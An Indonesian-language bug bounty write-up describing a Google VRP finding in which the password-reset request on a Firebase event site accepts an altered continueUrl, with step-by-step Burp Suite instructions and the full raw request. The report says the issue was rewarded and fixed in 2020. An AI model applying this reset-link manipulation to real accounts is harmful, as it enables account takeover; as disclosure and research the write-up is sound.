Assalamu’alaikum wr. wb.

Salam semangat untuk sobat progress dimanapun anda berada, kembali lagi bersama saya rootbakar setelah sekian lama fakum dalam berbagi postingan-postingan menarik terkait Bug Bounty.

Oke pada kesempatan yang baik kali ini saya akan membagikan postingan terkait temuan saya pada salah satu search engine terbaik di dunia yaitu Google dalam program Bug Bounty nya yaitu Google VRP

SUMMARY

Sedikit penjelasan terkait kerentanan yang saya temukan ini yaitu bagaimana seorang attacker dengan mudahnya mengarahkan atau memposisikan link dalam proses forgot password ke sembarang link dimana di asumsikan seorang attacker dapat memposisikan link forgot password kedalam servernya dengan tujuan mendapatkan token dari pada user atau akun yang ditargetkan. Pada issue kali ini membutuhkan interaksi dari user atau target yang bersangkutan dengan cara mengklik link yang dikirimkan pada email nya.

POC

1. Buka https://firebaseonair.withgoogle.com/events/firebase-live20

2. Klik SIGN IN

3. Klik CONTINUE WITH EMAIL

4. Masukan email dari target dan klik NEXT

5. Jangan memasukkan password, tetapi klik FORGOT PASSWORD dan klik RESET PASSWORD

6. Intercept dengan menggunakan BURP SUITE dan klik FORWARD sampai anda menemukan request seperti di bawah ini

POST /identitytoolkit/v3/relyingparty/getOobConfirmationCode?key=AIzaSyC1a0zObeFwLX6lp3psqKSqeSvyTJl-2Xg HTTP/1.1
Host: www.googleapis.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q=0.7,id;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Client-Version: Firefox/JsCore/7.14.2/FirebaseCore-web
Content-Length: 165
Origin: https://firebaseonair.withgoogle.com
Connection: close
Referer: https://firebaseonair.withgoogle.com/events/firebase-live20


{"requestType":"PASSWORD_RESET","email":"target-email@gmail.com","continueUrl":"https://firebaseonair.withgoogle.com/events/firebase-live20","canHandleCodeInApp":false}

7. Ubah continueUrl ke https://localhost:9090/

8. Klik Send Request pada BURP SUITE

9. Boommmm,, link password berhasil berubah pada email korban

SCREENSHOT

 

 

 

   

IMPACT

Memposisikan link ke server penyerang dengan tujuan mengambil alih akun dari user atau target yang bersangkutan.

TIMELINE

  • Report: 12 Agustus 2020
  • First Response: 12 Agustus 2020
  • Assigned: 12 Agustus 2020
  • Triage: 12 Agustus 2020
  • Nice Catch: 14 Agustus 2020
  • Rewards: 19 Agustus 2020
  • Fixed: 28 Agustus 2020

TIMELINE SCREENSHOT

 

 

 

 

Terimakasih sudah menyempatkan untuk membaca postingan saya ini semoga menginspirasi dan membantu kalian dalam menemukan bug-bug serupa pada platform Google VRP atau lainnya dan Jangan lupa sempatkan sedikit waktunya untuk subscribe youtube kami yah di Progress28. Salam semangat dan Happy Hunting

By: rootbakarPosted on Categories : Categories : Bug Bounty, Google VRPTags: